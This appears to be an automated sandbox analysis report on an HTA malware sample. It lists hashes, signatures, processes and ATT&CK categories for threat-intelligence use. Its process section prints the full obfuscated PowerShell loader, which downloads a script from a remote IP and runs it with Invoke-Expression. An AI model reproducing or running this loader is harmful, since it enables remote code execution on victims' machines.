135.148.74.241_HCrypt.zip

General
Target

135.148.74.241_HCrypt/PS1.hta

Filesize

3KB

Completed

20-01-2022 14:34

Score
10/10
MD5

37f9dc388fedc16b308acaadc34c2054

SHA1

25c936c0b399b82ad39363f6237fd5db13369bda

SHA256

f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://135.148.74.241/PS1_B.txt

Signatures 5

Filter: none

Defense Evasion
Discovery
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    mshta.exe

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Mainmshta.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    1468powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1468powershell.exe
  • Suspicious use of WriteProcessMemory
    mshta.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 760 wrote to memory of 1468760mshta.exepowershell.exe
    PID 760 wrote to memory of 1468760mshta.exepowershell.exe
    PID 760 wrote to memory of 1468760mshta.exepowershell.exe
    PID 760 wrote to memory of 1468760mshta.exepowershell.exe
Processes 2
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta"
    Modifies Internet Explorer settings
    Suspicious use of WriteProcessMemory
    PID:760
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1468
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • memory/1468-53-0x0000000075D61000-0x0000000075D63000-memory.dmp

                      • memory/1468-56-0x0000000002560000-0x00000000031AA000-memory.dmp

                      • memory/1468-57-0x0000000002560000-0x00000000031AA000-memory.dmp

                      • memory/1468-58-0x0000000002560000-0x00000000031AA000-memory.dmp